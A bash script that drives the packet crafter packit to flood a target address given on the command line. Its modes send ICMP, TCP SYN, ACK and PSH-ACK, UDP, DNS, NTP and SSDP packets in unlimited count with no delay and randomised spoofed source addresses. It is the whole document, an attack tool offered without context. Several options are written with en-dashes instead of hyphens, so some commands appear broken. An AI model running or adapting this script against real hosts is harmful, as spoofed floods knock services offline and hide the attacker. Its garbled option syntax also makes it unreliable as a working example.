#!/bin/bash

ipsource=$(hostname -I)

if [[ $2 = "ICMP" ]]
then
packit -t icmp -sR -d $1 -c 0 -b 0 -w 0
fi

if [[ $2 = "TCP-SYN" ]]
then
packit -t tcp -sR -d $1 -D 80 –c 0 -b 0 -w 0 -F S
fi

if [[ $2 = "TCP-SA" ]]
then
packit -t tcp -sR -d $1 -D 80 -c 0 -b 0 –w 0 –F AP -p '0x 66 72 65 64 77 61 73 68 65 72 65 66 72 65 64 77 61 73 68 65 72 65'
fi

if [[ $2 = "TCP-ACK" ]]
then
packit -t tcp -sR -d $1 -D 80 –c 0 -b 0 -w 0 -F A
fi

if [[ $2 = "UDP" ]]
then
packit -t udp –D 80 -sR -d $1 -c 0 –b 0 –w 0
fi

if [[ $2 = "DNS" ]]
then
packit -t udp -sR -d $1 -D 80 -c 0 -w 0 -b 0 -p '0x f9 79 01 00 00 01 00 00 00 00 00 00 06 6d 75 70 70 65 74 03 63 6f 6d 00 00 01 00 01'
fi

if [[ $2 = "DNS-M" ]]
then
packit -t udp -sR -d $1 -D 80 -c 0 -w 0 -b 0 -p '0x c0 a8 0a 1f 40 4e 96 85 de 9b 00 35 00 23 a9 35 89 e4 01 00 00 01 00 00 00 00 00 00 05 75 61 68 6f 6f 03 63 6f 6d 00 00 01 00 01'
fi

if [[ $2 = "NTP" ]]
then
packit -t udp -S 123 –D 80 -sR -d $1 -c 0 –b 0 –w 0
fi

if [[ $2 = "SSDP" ]]
then
packit -t udp -S 1900 –D 80 -sR -d $1 -c 0 –b 0 –w 0
fi
